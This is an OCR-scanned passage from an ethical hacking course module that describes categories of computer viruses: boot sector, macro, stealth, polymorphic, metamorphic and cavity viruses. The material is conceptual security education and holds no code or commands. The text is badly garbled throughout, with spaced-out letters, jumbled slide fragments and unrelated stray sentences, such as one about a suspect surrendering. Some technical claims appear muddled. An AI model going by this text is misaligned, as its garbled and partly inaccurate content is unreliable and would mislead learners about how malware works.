o r o n l y file s w h o s e le n g t h s fa ll w i t h i n a n a r r o w ra n g e . C o m p a n io n V iru s e s T h e c o m p a n i o n v ir u s s to re s it s e lf b y h a v in g t h e i d e n t i c a l f i l e n a m e as t h e t a r g e t e d p r o g r a m file . As s o o n as t h a t f ile is e x e c u t e d , t h e v ir u s in f e c ts t h e c o m p u t e r , a nd h a r d d is k d a ta is m o d if ie d . ^ C a m o u fla g e V iru s e s o f t h e user. T he se v iru s e s a re n o t
W -------- T h e y d is g u is e t h e m s e l v e s as g e n u in e a p p li c a t i o n s
d i f f i c u l t t o f i n d since a n t i v i r u s p r o g r a m s h a v e a d v a n c e d t o t h e p o i n t w h e r e such v iru s e s are e a sily t r a c e d . S h e ll V ir u s e s _____ T his v ir u s c o d e f o r m s a la y e r a r o u n d t h e t a r g e t h o s t p r o g r a m 's c o d e t h a t can be
M o d u le 0 7 P ag e 1036
c o m p a r e d t o an " e g g s h e l l / m a k in g i t s e lf t h e o rig in a l p r o g r a m a n d t h e h o s t c o d e its s u b r o u t i n e . H e re , t h e o rig in a l c o d e is m o v e d t o a n e w l o c a t io n by t h e v ir u s c o d e a n d t h e v i r u s a s s u m e s its i d e n t it y . F ile E x te n s io n V ir u s e s F. File e x t e n s i o n v ir u s e s c h a n g e t h e e x te n s io n s o f file s ; .TXT is safe, as it in d ic a te s a p u r e t e x t file . If y o u r c o m p u t e r 's f i l e e x t e n s i o n s v i e w is t u r n e d o f f a n d s o m e o n e s e n d s y o u a file n a m e d BA D .T X T .V B S , y o u w i ll see o n l y B A D .TXT. > ' f | A d d -o n V iru s e s M o s t v iru s e s a re a d d - o n v iru s e s . T his t y p e o f v ir u s a p p e n d s its c o d e t o t h e b e g in n in g o f t h e h o s t c o d e w i t h o u t m a k in g a n y c h a n g e s t o t h e l a t t e r . T hu s , t h e v ir u s c o r r u p t s t h e s t a r t u p i n f o r m a t i o n o f t h e h o s t c o d e , a n d places it s e lf in its p la ce, b u t it d o e s n o t t o u c h t h e h o s t c o d e . H o w e v e r , t h e v iru s c o d e is e x e c u t e d b e f o r e t h e h o s t c o d e . T h e o n l y in d i c a t i o n t h a t t h e file is c o r r u p t e d is t h a t t h e size o f t h e file has in c re a s e d . In tr u s iv e V iru s e s T his f o r m o f v ir u s o v e r w r i t e s its c o d e e i t h e r b y c o m p l e t e l y r e m o v i n g t h e t a r g e t h o s t's
p r o g r a m c o d e , o r s o m e t i m e s it o n l y o v e r w r i t e s p a r t o f it. T h e r e f o r e , t h e o rig in a l c o d e is n o t e x e c u te d p r o p e r ly . D ir e c t A c tio n o r T r a n s ie n t V iru s e s T r a n s fe r s all c o n t r o l s t o t h e h o s t c o d e w h e r e it reside s, se le c ts t h e t a r g e t p r o g r a m t o be m o d if ie d , a nd c o r r u p t s it. = ffr *y ' T e r m in a t e a n d S ta y R e s id e n t V ir u s e s (T S R s) A TSR v i r u s r e m a in s p e r m a n e n t l y in m e m o r y d u r in g t h e e n t i r e w o r k se ssio n, e v e n
a f t e r t h e t a r g e t h o s t p r o g r a m is e x e c u te d a n d t e r m i n a t e d . It can be r e m o v e d o n l y b y r e b o o t i n g t h e s y s te m .
M o d u le 0 7 P ag e 1037
S y s t e m
o r
B o o t
S e c t o r V
i r u s e s
C E H
B o o t S e c to r V ir u s
E x e c u tio n
B o o t s e c to r v iru s m o v e s M B R to a n o th e r lo c a tio n o n th e hard disk an d cop ie s its e lf to th e o rig in a l lo c a tio n o f MBR
W h e n system b o o ts , v iru s co d e is e x e c u te d fir s t an d th e n c o n tro l is passed to o rig in a l MBR
B e fo re In fe c tio n
A fte r In fe c tio n
V iru s C o d e
MBR
Copyright by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
S y s te m
o r B o o t S e c to r V ir u s e s
S y s te m s e c t o r v iru s e s can be d e f i n e d as t h o s e t h a t a f f e c t t h e e x e c u t a b l e c o d e o f t h e
disk, r a t h e r t h a n t h e b o o t s e c t o r v ir u s t h a t a ffe c ts t h e DOS b o o t s e c t o r o f t h e disk. A n y s y s te m is d iv i d e d i n t o a reas, c a lle d s e c to rs , w h e r e t h e p r o g r a m s a re s to r e d . T h e t w o ty p e s o f s y s te m s e c to r s are: 0 M B R ( M a s t e r B o o t R e c o rd ) M BR s a re t h e m o s t v i r u s - p r o n e z o n e s b e c a u s e if t h e M B R is c o r r u p t e d , all d a ta w i ll be lost. 0 DBR (DOS B o o t R e c o rd ) T h e DOS b o o t s e c t o r is e x e c u t e d w h e n e v e r t h e s y s te m is b o o t e d . T his is t h e c r u c ia l p o i n t o f a t t a c k f o r viru s e s . T h e s y s te m s e c t o r co n s is ts o f 5 1 2 b y t e s o f m e m o r y . Because o f th is , s y s te m s e c t o r v iru s e s c o n c e a l t h e i r c o d e in s o m e o t h e r d isk space. T h e m a in c a r r i e r o f s y s te m s e c t o r v iru s e s is t h e f l o p p y disk. T h e se v iru s e s g e n e r a lly re s id e in t h e m e m o r y . T h e y can also be c a u se d b y T ro ja n s . S o m e s e c t o r v iru s e s also s p re a d t h r o u g h i n f e c t e d file s , a n d t h e y a re ca lle d m u l t i p a r t v iru s e s .
M o d u le 0 7 P ag e 1038
V iru s R e m o v a l S y s te m s e c t o r v iru s e s a re d e s ig n e d t o c r e a te t h e illu s io n t h a t t h e r e is n o v ir u s o n t h e s y s te m . O n e w a y t o d ea l w i t h t h is v ir u s is t o a v o id t h e use o f t h e W i n d o w s o p e r a t i n g
s y s t e m , a n d s w it c h t o L in ux o r M a cs, b e c a u s e W i n d o w s is m o r e p r o n e t o th e s e a tta c k s . L inux a n d M a c i n t o s h h a v e a b u i l t - i n s a f e g u a r d t o p r o t e c t a g a in s t th e s e v iru s e s . T h e o t h e r w a y is t o c a r r y o u t a n t i v i r u s ch e c k s o n a p e r io d ic basis.

B e fo r e In f e c tio n
G
A f t e r I n f e c tio n V
O
V iru s C ode FIGURE 7 .6 : S yste m o r B o o t S e c to r V iru se s
M o d u le 0 7 P ag e 1039
i l e
a n d
l t i p
r t i t e
i r u s e s
C E H
F ile
a n d
M u ltip a r tite
V ir u s e s
F ile V ir u s e s File v iru s e s i n f e c t file s t h a t a re e x e c u te d o r i n t e r p r e t e d in t h e s y s te m such as C O M , EXE, SYS, OVL, OBJ, PRG, M N U , a n d BAT file s. File v iru s e s can be e i t h e r d i r e c t - a c t i o n ( n o n - r e s i d e n t ) o r m e m o r y - r e s i d e n t . O v e r w r i t i n g v iru s e s ca use i r r e v e r s i b l e d a m a g e t o t h e files. T h e s e v iru s e s m a i n l y t a r g e t a r a n g e o f o p e r a t i n g s y s te m s t h a t in c lu d e W i n d o w s , UNIX, DOS, a n d M a c i n t o s h . C h a r a c te r iz in g F ile V iru s e s File v iru s e s a re m a i n l y c h a r a c te r iz e d and d e s c r ib e d b ase d on th e ir p h ysica l b e h a v io r o r
c h a r a c te r is t ic s . T o cla ssify a file v ir u s is b y t h e t y p e o f file t a r g e t e d by it, such as EXE o r C O M file s, t h e b o o t s e c to r , e tc. A f ile v ir u s can also be c h a r a c t e r iz e d b ase d o n h o w it i n f e c ts t h e t a r g e t e d file (also k n o w n as t h e h o s t files): Q Q Q P r e p e n d in g : w r i t e s it s e lf i n t o t h e b e g in n in g o f t h e h o s t file 's c o d e A p p e n d i n g : w r i t e s it s e lf t o t h e e n d o f t h e h o s t file O v e r w r i t i n g : o v e r w r i t e s t h e h o s t file 's c o d e w i t h its o w n c o d e I n s e r t i n g : in s e rts it s e lf i n t o gaps in s id e t h e h o s t file 's c o d e
M o d u le
07
P ag e 1 0 4 0
C o m p a n i o n : r e n a m e s t h e o rig in a l f ile a n d w r i t e s it s e lf w i t h t h e h o s t file 's n a m e C a v ity i n f e c t o r : w r i t e s it s e lf b e t w e e n file s e c tio n s o f 3 2 - b i t file
File v iru s e s a re also cla ssifie d b ase d o n w h e t h e r t h e y a re n o n - m e m o r y r e s i d e n t o r m e m o r y r e s id e n t. N o n - m e m o r y r e s i d e n t v iru s e s s e a rch f o r EXE fi l e s o n a h a r d d r iv e a n d t h e n i n f e c t t h e m , w h e r e a s m e m o r y r e s i d e n t v iru s e s sta ys a c tiv e ly in m e m o r y , a n d t r a p o n e o r m o r e s y s te m f u n c t io n s . File v iru s e s a re said t o be p o l y m o r p h i c , e n c r y p t e d , o r n o n - e n c r y p t e d . A p o l y m o r p h i c o r e n c r y p t e d v ir u s c o n t a in s o n e o r m o r e d e c r y p t o r s a n d a m a in co d e . M a i n v ir u s c o d e is d e c r y p t e d b y t h e d e c r y p t o r b e f o r e i t s ta rts . A n e n c r y p t e d v ir u s u s u a lly uses v a r ia b le o r fi x e d k e y d e c r y p t o r s , w h e r e a s p o l y m o r p h i c v iru s e s h a ve d e c r y p t o r s t h a t a re r a n d o m l y g e n e r a t e d f r o m i n s t r u c t i o n s o f p r o c e s s o rs a n d t h a t c o n s is t o f a l o t o f c o m m a n d s t h a t a re n o t used in t h e d e c r y p t i o n p ro c e s s . E x e c u t io n o f P a y lo a d : D ir e c t a c tio n : I m m e d i a t e l y u p o n e x e c u t io n T im e b o m b : A f t e r a s p e c ifie d p e r io d o f t i m e C o n d i t i o n t r ig g e r e d : O n ly u n d e r c e r ta in c o n d it io n s M u ltip a r tite V iru s e s A m u l t i p a r t i t e v ir u s is also k n o w n as a m u l t i - p a r t v i r u s t h a t a t t e m p t s t o a t t a c k b o t h t h e b o o t s e c t o r a n d t h e e x e c u ta b le o r p r o g r a m file s a t t h e s a m e t i m e . W h e n r g w v ir u s is a t t a c h e d t o t h e b o o t s e c to r , it w i ll in t u r n a f f e c t t h e s y s te m file s , a n d t h e n t h e v ir u s a tta c h e s t o t h e file s, a n d t h is t i m e it w ill in t u r n i n f e c t t h e b o o t s e c to r .
FIGURE 7 .7 : File a n d M u lt ip a r tite V iru se s
M o d u le 0 7 P ag e 1041
M a c ro V iru ses
0 11.
Infects M acro Enabled D o cu m en ts
Urt1fw4
CEH
ilh iu l lUtbM
A tta c k e r
U ser
0 r 0 M o s t m a c ro viruses are w r itte n using m a c ro lang uag e V isual Basic fo r A p p lic a tio n s (VBA)
0 0 M a cro viruses infe ct te m p la te s o r co n ve rt in fe c te d d o cu m e n ts in to te m p la te files, w h ile m a in ta in in g th e ir a p pearance o f o rd in a ry d o c u m e n tfile s r V
C o p y r ig h t b y E C -C a Illicit A l 1R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
M a c r o
V ir u s e s
M i c r o s o f t W o r d o r s i m i l a r a p p li c a t i o n s can be i n f e c t e d t h r o u g h a c o m p u t e r v i r u s c a lle d m a c r o v iru s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c tio n s w h e n t h e a p p li c a t i o n is t r i g g e r e d o r s o m e t h i n g else. M o s t m a c r o v iru s e s a re w r i t t e n u s in g t h e m a c r o la n g u a g e V is u a l Basic f o r A p p l i c a t i o n s (V B A ) a n d t h e y i n f e c t t e m p l a t e s o r c o n v e r t i n f e c t e d d o c u m e n t s i n t o t e m p l a t e file s, w h i l e m a i n t a i n in g t h e i r a p p e a r a n c e o f o r d i n a r y d o c u m e n t file s. M a c r o v ir u s e s a re s o m e w h a t less h a r m f u l t h a n o t h e r ty p e s . T h e y a re u s u a lly s p re a d via an e m a il. P ure d a ta file s d o n o t a l l o w t h e s p re a d o f v iru s e s , b u t s o m e t i m e s t h e lin e b e t w e e n a d a ta f ile a n d an e x e c u t a b l e f i l e is e a sily o v e r l o o k e d by t h e a v e r a g e u se r d u e t o t h e e x te n s iv e m a c r o la n g u a g e s in s o m e p r o g r a m s . In m o s t cases, j u s t t o m a k e t h in g s easy f o r users, t h e lin e b e t w e e n a d a ta file a n d a p r o g r a m s ta r t s t o b lu r o n l y in cases w h e r e t h e d e f a u l t m a c r o s a re s e t t o ru n a u t o m a t i c a l l y e v e r y t i m e t h e d a ta file is lo a d e d . V ir u s w r i t e r s can e x p l o i t c o m m o n p r o g r a m s w i t h m a c r o c a p a b i l it y such as M i c r o s o f t W o r d , Excel, a n d o t h e r O ffic e p r o g r a m s . W i n d o w s H e lp file s can also c o n t a i n m a c r o c o d e . In a d d it io n , t h e la t e s t e x p l o i t e d m a c r o c o d e e xists in t h e fu ll v e r s io n o f t h e A c r o b a t p r o g r a m t h a t re a d s a n d w r i t e s PDF files.
M o d u le 0 7 P ag e 1042
Infects Macro Enabled Documents

A tta c k e r
FIGURE 7 .8 : M a c ro V iru se s
User
M o d u le 0 7 P ag e 1043
C lu s te r V iru ses
C lu s te r V iru s e s
a
CEH
: I : * ]
C lu s te r viruse s m o d ify d ire c to ry ta b le e n trie s so th a t it p o in ts users o r system processes to th e v iru s co d e inste ad o f th e a c tu a l p ro g ra m
V iru s
C o p y
T h ere is o n ly o n e c o p y o f th e viru s on th e disk in fe c tin g all th e p ro g ra m s in th e c o m p u te r system
L a u n c h
Its e lf
It w ill la u n ch its e lf fir s t w h e n a n y p ro g ra m on th e c o m p u te r system is s ta rte d an d th e n th e c o n tro l is passed to a c tu a l p ro g ra m
C o p y rig h t b y EC -C auactl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d
C lu s te r V ir u s e s C lu s te r v iru s e s in f e c t file s w i t h o u t c h a n g in g t h e file o r p la n t in g e x tr a file s t h e y c h a n g e t h e DOS d i r e c t o r y i n f o r m a t i o n so t h a t e n t r i e s p o i n t t o t h e v ir u s c o d e in s te a d o f t h e a c tu a l p r o g r a m . W h e n a p r o g r a m r u n s DOS, it f i r s t lo a d s a n d e x e c u te s t h e v iru s c o d e , a n d t h e n t h e v ir u s lo c a te s t h e a c tu a l p r o g r a m a n d e x e c u te s it. D ir-2 is an e x a m p le o f t h is t y p e o f v iru s . C lu s te r v iru s e s m o d i f y d i r e c t o r y t a b l e e n t r i e s so t h a t d i r e c t o r y e n t r i e s p o i n t t o t h e v ir u s c o d e . T h e r e is o n l y o n e c o p y o f t h e v ir u s o n t h e d is k i n f e c t i n g all t h e p r o g r a m s in t h e c o m p u t e r s y s te m . It w i ll la u n c h i t s e lf f i r s t w h e n a n y p r o g r a m o n t h e c o m p u t e r s y s te m is s t a r t e d a n d t h e n t h e c o n t r o l is p assed t o t h e a c tu a l p r o g r a m .
M o d u le 0 7 P ag e 1044
Stealth/Tunneling Viruses
T h e s e v iru s e s e v a d e t h e a n ti- v ir u s s o ft w a r e b y in te r c e p t in g its re q u e s ts t o th e o p e r a t in g s y s te m A v iru s can h id e it s e lf b y in te r c e p t in g th e a n ti- v ir u s s o ftw a r e 's r e q u e s t to re a d th e file a n d p a s s in g th e r e q u e s t to th e v iru s , in s te a d o f th e OS T h e v iru s c an th e n r e t u r n a n u n in fe c te d v e r s io n o f t h e file to th e a n tiv iru s s o ft w a r e , s o th a t it a p p e a r s as i f th e file is " c le a n "
CEH
Hides Infected TCPIP.SYS
if
Here you go Original TCPIP.SYS
S te a lth /T u n n e lin g
V ir u s e s
S te a lth V ir u s e s T h e s e v iru s e s t r y t o h id e t h e m s e l v e s f r o m a n t i v i r u s p r o g r a m s by a c tiv e ly a lt e r in g a nd
c o r r u p t i n g t h e c h o s e n s e rv ic e call i n t e r r u p t s w h e n t h e y a re b e in g ru n . R e q u e s ts t o p e r f o r m o p e r a t i o n s in r e s p e c t t o th e s e se rv ic e call i n t e r r u p t s a re r e p la c e d by v iru s c o d e . T h e se v iru s e s s ta te fa lse i n f o r m a t i o n t o h id e t h e i r p r e s e n c e f r o m a n t i v i r u s p r o g r a m s . For e x a m p le , t h e s t e a l t h v i r u s h id e s t h e o p e r a t i o n s t h a t it m o d i f i e d a n d g ive s fa ls e r e p r e s e n t a t i o n s . T hu s, it ta k e s o v e r p o r t i o n s o f t h e t a r g e t s y s te m a nd h id e s its v ir u s co d e . T h e s t e a lt h v iru s h id e s it s e lf f r o m a n t i v i r u s s o f t w a r e by h id in g t h e o rig in a l size o f t h e file o r t e m p o r a r i l y p la c in g a c o p y o f it s e lf in s o m e o t h e r d r iv e o f t h e s y s te m , t h u s r e p la c in g t h e i n f e c t e d file w i t h t h e u n i n f e c t e d file t h a t is s t o r e d o n t h e h a r d d riv e . A s t e a lt h v ir u s h id e s t h e m o d if ic a t i o n s t h a t it m a k e s . It ta k e s c o n t r o l o f t h e s y s te m 's f u n c t io n s t h a t re a d file s o r s y s te m s e c to r s a n d , w h e n a n o t h e r p r o g r a m r e q u e s ts i n f o r m a t i o n t h a t has a lr e a d y b e e n m o d i f i e d by t h e v iru s , t h e s t e a l t h v i r u s r e p o r t s t h a t i n f o r m a t i o n t o t h e r e q u e s t i n g p r o g r a m in s te a d . T his v ir u s a lso re s id e s in t h e m e m o r y . T o a v o id d e t e c t i o n , th e s e v iru s e s a lw a y s t a k e o v e r s y s te m f u n c t i o n s a n d use t h e m t o h id e t h e i r p re s e n c e .
M o d u le 0 7 P ag e 1045
O n e o f t h e c a rr ie r s o f t h e s t e a lth v ir u s is t h e r o o t k i t . In s ta llin g a r o o t k i t g e n e r a l l y r e s u lts in t h is v ir u s a t t a c k b e c a u s e r o o t k i t s a re in s t a lle d via T ro ja n s , a n d t h u s a re c a p a b le o f h id in g a n y m a lw a re . R e m o v a l: Q e / T u n n e lin g V ir u s e s T h e s e v iru s e s t r a c e t h e s te p s o f i n t e r c e p t o r p r o g r a m s t h a t m o n i t o r o p e r a t i n g s y s t e m r e q u e s ts so t h a t t h e y g e t i n t o BIOS a n d DOS t o in s ta ll th e m s e lv e s . To p e r f o r m th is a c tiv it y , t h e y even tu n n e l u n d e r a n tiv iru s s o ftw a re p ro g ra m s.
G iv e m e t h e s y s t e m file tc p ip .s y i t o ic o n
A lw a y s d o a c o ld b o o t ( b o o t f r o m w r i t e - p r o t e c t e d f l o p p y d isk o r CD) N e v e r use DOS c o m m a n d s such as FDISK t o fix t h e v iru s Use a n t i v i r u s s o f t w a r e
A n ti-v iru s S o ftw a re

H id e s I n f e c te d TCPIP.SYS
VIRUS
Here you go
O rig in a l TCPIP.SYS
FIGURE 7 .9 : W o rk in g o f S te a lth /T u n n e lin g V iru se s
M o d u le 0 7 P ag e 1046
E th ic a l H a c k in g a n d C o u n t e r m e a s u r e s
E x a m 3 1 2 - 5 0 C e r t if ie d E th ic a l H a c k e r
V iru ses a n d W o rm s
E n c ry p tio n V iru ses
T his ty p e o f v iru s u s e s s im p le e n c r y p t io n t o e n c ip h e r t h e c o d e
CEH
V iru s C o d e
r
T h e v iru s is e n c r y p t e d w ith a d iffe re n t key fo r ea ch in f e c te d file AV s c a n n e r c a n n o t d ire c tly d e t e c t t h e s e ty p e s o f v ir u s e s u s in g s ig n a t u r e d e te c tio n m e th o d s
Encryption Virus 2 Encryption Virus 3
V.
-/
E n c r y p tio n
V ir u s e s
T his t y p e o f v ir u s co n s is ts o f an e n c r y p t e d c o p y o f t h e v iru s a nd a d e c r y p t i o n m o d u l e . T h e d e c r y p t i n g m o d u l e r e m a in s c o n s t a n t , w h e r e a s t h e d i f f e r e n t keys a re u sed f o r e n c r y p t i o n . T h e s e v iru s e s g e n e r a l l y e m p l o y XO R o n e a ch b y te w i t h a r a n d o m i z e d key. T h e v ir u s is e n c i p h e r e d w i t h an e n c r y p t i o n k e y t h a t co n s is ts o f a d e c r y p t i o n m o d u l e a nd an e n c r y p t e d c o p y o f t h e c o d e . Q For e a ch i n f e c t e d file , t h e v ir u s is e n c r y p t e d b y u sin g a d i f f e r e n t c o m b i n a t i o n o f keys, b u t t h e d e c r y p t i n g m o d u l e p a r t r e m a in s u n c h a n g e d . It is n o t p o s s ib le f o r t h e v ir u s s c a n n e r t o d ir e c t ly d e te c t th e v ir u s by m e a n s o f
s ig n a t u r e s , b u t t h e d e c r y p t i n g m o d u l e ca n be d e t e c t e d . e T h e d e c r y p t i o n t e c h n i q u e e m p lo y e d is x o r e a ch b y te w i t h a r a n d o m i z e d ke y t h a t is g e n e r a t e d a n d sa ved b y t h e r o o t v iru s .
M o d u le 0 7
Page 1047
Ethical H acking a n d C o u n te rm e a s u re s
C o p y r ig h t
by
EC-C0UnCil
A l l R i g h t s R e s e r v e d . R e p r o d u c t i o n is S t r i c t l y P r o h i b i t e d .
Virus Code
E n c ry p tio n V ir u s 1
E n c ry p tio n V ir u s 2
E n c r y p tio n V ir u s B
FIGURE 7 .1 0 : W o rk in g o f E n c ry p tio n V iru se s
M o d u le 0 7 P ag e 1048
P o ly m o rp h ic Code
J J P o ly m o r p h ic c o d e is a c o d e t h a t m u ta te s w h ile k e e p in g th e o r ig in a l a lg o r ith m in ta c t To e n a b le p o ly m o r p h ic c o d e , th e v iru s h a s to h a v e a p o ly m o r p h ic e n g in e (a ls o c a lle d m u ta tin g e n g in e o r m u ta tio n e n g in e J A w e ll- w r it t e n p o ly m o r p h ic v iru s th e r e f o r e h a s n o p a r ts t h a t s ta y t h e s a m e o n e a ch in fe c tio n
CEH
39Encrypted Mutation Engine Encrypted Virus Code Decryptor Routine ........... Decryptor routine decrypts virus code and mutation engine
N e w P o ly m o r p h ic V iru s
U ser Runs an In f e c t e d P r o g r a m
RAM
P o ly m o r p h ic
C o d e
P o l y m o r p h ic v iru s e s m o d i f y t h e i r c o d e f o r e a ch r e p li c a t i o n in o r d e r t o a v o i d d e t e c t i o n . T h e y a c c o m p lis h t h is b y c h a n g in g t h e e n c r y p t i o n m o d u l e a nd t h e i n s t r u c t i o n s e q u e n c e . A r a n d o m n u m b e r g e n e r a t o r is used f o r i m p l e m e n t i n g p o l y m o r p h i s m . A m u t a t i o n e n g in e is g e n e r a l l y used t o e n a b le p o l y m o r p h i c c o d e . T h e m u t a t o r p r o v id e s a s e q u e n c e o f i n s t r u c t i o n s t h a t a v i r u s s c a n n e r can use t o o p t i m i z e an a p p r o p r i a t e d e t e c t i o n a lg o r i t h m . S lo w p o l y m o r p h i c c o d e s a re u sed t o p r e v e n t a n t i v i r u s p r o f e s s i o n a l s f r o m accessing th e codes. V ir u s s a m p le s , w h i c h a re b a it file s a f t e r a s ing le e x e c u t i o n is i n f e c t e d , c o n t a i n a s i m i l a r c o p y o f t h e viru s . A s im p le i n t e g r i t y c h e c k e r is used t o d e t e c t t h e p r e s e n c e o f a p o l y m o r p h i c v iru s in th e s y s te m 's disk.
M o d u le 0 7 P ag e 1049
E n c ry p te d M u ta tio n E n g in e (EM E) j
Mutation E ncrypted n c ry Engine Encrypted Virus Code
Instruct
A to 0
A In s tr u c t t o
i I
Decryptor Routine
Decryptor routine decrypts virus code and mutation engine
*
U ser R uns an In f e c te d P ro g r a m
V ir u s D o e s t h e D a m a g e
New Polymorphic Virus
RAM
FIGURE 7 .1 1 : H o w P o ly m o rp h ic C ode W o rk
P o l y m o r p h ic v iru s e s c o n s is t o f t h r e e c o m p o n e n t s . T h e y a re t h e e n c r y p t e d v i r u s c o d e , t h e d e c r y p t o r r o u t i n e , a n d t h e m u t a t i o n e n g in e . T h e f u n c t i o n o f t h e d e c r y p t o r r o u t i n e is t o d e c r y p t t h e v ir u s c o d e . It d e c r y p t s t h e c o d e o n l y a f t e r t a k i n g c o n t r o l o v e r t h e c o m p u t e r . T h e m u t a t i o n e n g in e g e n e r a t e s r a n d o m i z e d d e c r y p t i o n r o u t in e s . T his d e c r y p t i o n r o u t i n e s v a rie s e v e r y t i m e w h e n a n e w p r o g r a m is i n f e c t e d by t h e viru s . W i t h a p o l y m o r p h i c v iru s , b o t h t h e m u t a t i o n e n g in e a n d t h e v ir u s c o d e a re e n c r y p t e d . W h e n a p r o g r a m t h a t is i n f e c t e d w i t h a p o l y m o r p h i c v ir u s is ru n b y t h e user, t h e d e c r y p t o r r o u t i n e ta k e s c o m p l e t e c o n t r o l o v e r t h e s y s te m , a f t e r w h i c h it d e c r y p t s t h e v iru s c o d e a n d t h e m u t a t i o n e n g in e . N e x t, t h e c o n t r o l o f y o u r s y s te m is t r a n s f e r r e d by t h e d e c r y p t i o n r o u t i n e t o t h e v iru s , w h i c h lo c a te s a n e w p r o g r a m t o in f e c t. In R A M ( R a n d o m Access M e m o r y ) , t h e v ir u s m a k e s a r e p lic a o f it s e lf as w e l l as t h e m u t a t i o n e n g in e . T h e n t h e v ir u s in s t r u c t s t h e e n c r y p t e d m u t a t i o n e n g in e to g en erate a new ra n d o m iz e d d e c ry p tio n ro u tin e , w h ic h has t h e c a p a b i l it y of
d e c r y p t i n g v iru s . H ere, t h is n e w c o p y o f b o t h t h e v ir u s c o d e a n d m u t a t i o n e n g in e is e n c r y p t e d by t h e v iru s . T hu s, t h is v iru s , a lo n g w i t h t h e n e w ly e n c ry p te d v iru s co d e and e n c ry p te d
m u t a t i o n e n g in e (EM E), a p p e n d s t h is n e w d e c r y p t i o n r o u t i n e o n t o a n e w p r o g r a m , t h e r e b y c o n t i n u i n g t h e pro cess . P o l y m o r p h ic v iru s e s t h a t re s p re a d b y t h e a t t a c k e r in t a r g e t e d s y s te m s a re d i f f i c u l t t o d e t e c t b e c a u s e h e r e t h e v ir u s b o d y is e n c r y p t e d a n d t h e d e c r y p t i o n r o u t i n e s c h a n g e s e ach t i m e f r o m in f e c t i o n t o i n f e c t i o n a n d n o t w o in f e c t i o n s lo o k t h e s a m e ; th is m a k e it d i f f i c u l t f o r t h e v iru s s c a n n e r t o i d e n t i f y t h is v iru s .
M o d u le 0 7 P ag e 1050
M e ta m o rp h ic V iru s e s
M e ta m o rp h ic V iru s e s M e ta m o rp h ic C ode
CEH
U r t i f f e t f i t k N j I l U i l w t
M e ta m o rp h ic viruses re w r ite th e m s e lv e s c o m p le te ly each tim e th e y are t o in fe c t ne w e xe cu ta b le
M e ta m o rp h ic code can re p ro g ra m its e lf by tra n s la tin g its o w n code in to a te m p o ra ry re p re s e n ta tio n and th e n back to th e n o rm a l code again
For e xa m p le , W 3 2 /S im ile co n siste d o f o v e r 1 4 0 0 0 lines o f a sse m b ly code, 90% o f it is p a rt o f th e m e ta m o rp h ic e n g in e
MotaphoR V I by tHE moNTAL D illlei/2 9* MetaphoR VI bj HE mtfJTAL D < I# h /29*
E3
E l
a.) V ariant A c.) The "Unofficial Variant C
a tI A H M JI Lb Y i H f ca t N t a lc t t l l l l e r / ^ J A mEtAPHGR 1b BY 1H A1LER/2*\ rTAfSC iCbVlHE nW4l dFIIUi/2^
E l
b.) Variant B
[1E
d.) The .D variant (which was the *official' C of the original author)
M e ta m o r p h ic
V ir u s e s
S o m e v iru s e s r e w r i t e t h e m s e l v e s t o in f e c t n e w l y e x e c u te d files. Such v iru s e s are c o m p le x a n d use m e t a m o r p h i c e n g in e s f o r e x e c u t io n . A c o d e t h a t can r e p r o g r a m it s e lf is c a lle d m e t a m o r p h i c c o d e . T his c o d e is t r a n s l a t e d i n t o t h e t e m p o r a r y c o d e , a n d t h e n c o n v e r t e d b a ck t o t h e n o r m a l c o d e . This t e c h n i q u e , in w h i c h t h e o rig in a l a l g o r i t h m r e m a in s in t a c t , is used t o a v o id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e . This is m o r e e f f e c t i v e in c o m p a r i s o n t o p o l y m o r p h i c c o d e . T his t y p e o f v ir u s c o n s is ts o f c o m p le x e x te n s iv e c o d e . T h e c o m m o n l y k n o w n m e t a m o r p h i c v iru s e s a re : W in 3 2 /S im ile : T his v ir u s is w r i t t e n in a s s e m b ly la n g u a g e a n d d e s t i n e d f o r M i c r o s o f t W i n d o w s . T his p ro c e s s is c o m p le x , a n d n e a r ly 9 0 % o f v i r u s c o d e s a re g e n e r a t e d b y t h is pro cess. Z m is t : Z m is t is also k n o w n as t h e Z o m b ie . M is t f a l l is t h e f i r s t v i r u s t o use t h e t e c h n i q u e c a lle d " c o d e i n t e g r a t i o n . " T his c o d e in s e rts i t s e lf i n t o o t h e r c o d e , r e g e n e r a t e s t h e c o d e , a n d r e b u ild s t h e e x e c u ta b le .
M o d u le 0 7 P ag e 1051
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
a.) Variant A
c.) The "Unofficial" Variant C

mETAPhOr 1C bY tHE mENtal dRllle1/29A mETAPhOr 1C bY (HE mENtal dRlller/29A Q
ImElAPHOR 1b BY tHe MeNTAI drilLER/29A mEtAPHOR 1b BY tHe MeNTAI drilLER/29A
.....ok... d.) The .D variant (which was the "official" C of the original author)
FIGURE 7.12: Metamorphic Viruses Screenshot
b.) Variant B
Module 07 Page 1052
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
F ile O v e rw ritin g o r C a v ity V iru s e s
C E H
Cavity Virus overwrites a part of the host file with a constant (usually nulls), without increasingthe length of the file and preserving its functionality
Sales and marketing management is the leading authority for executives in the sales and marketing management industries The suspect, Desmond Turner, surrendered to authorities at a downtown Indianapolis fast-food restaurant
O rig in a l File S ize: 4 5 KB
Null Null Null Null Null Null
Null Null Null Null Null NUll
In fe c te d File
>
Copyright
Size: 4 5 KB
23a
by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
F ile O v e rw ritin g o r C a v ity V iru s e s

These are also known as space-fillers since they maintain a constant file-size while infected by installing them selves into the target program. They append themselves to the end of files and also corrupt the start of files. This trigger event first activates and executes the virus code, and later the original application program. Some program files have areas of em pty space. This em pty space is the main target of these viruses. The Cavity Virus, also known as the Space Filler Virus, stores its code in this em pty space. The virus installs itself in this unoccupied space w ith out any destru ctio n to the original code. It installs itself in the file it attem pts to infect. This type of virus is rarely used because it is difficult to write. A new W in d o w s file called the Porta ble Executable it designed for the fast loading of programs. However, it leaves a certain gap in the file while it is being executed that can be used by the Space Filler Virus to insert itself. The most popular virus fam ily is the CIH virus.
Original File Size: 45 K B I
..................................................................................... ^
h
PDF FIGURE 7.13: File Overwriting or Cavity Virus
L PDF
>1
Infected File Size: 45 K B
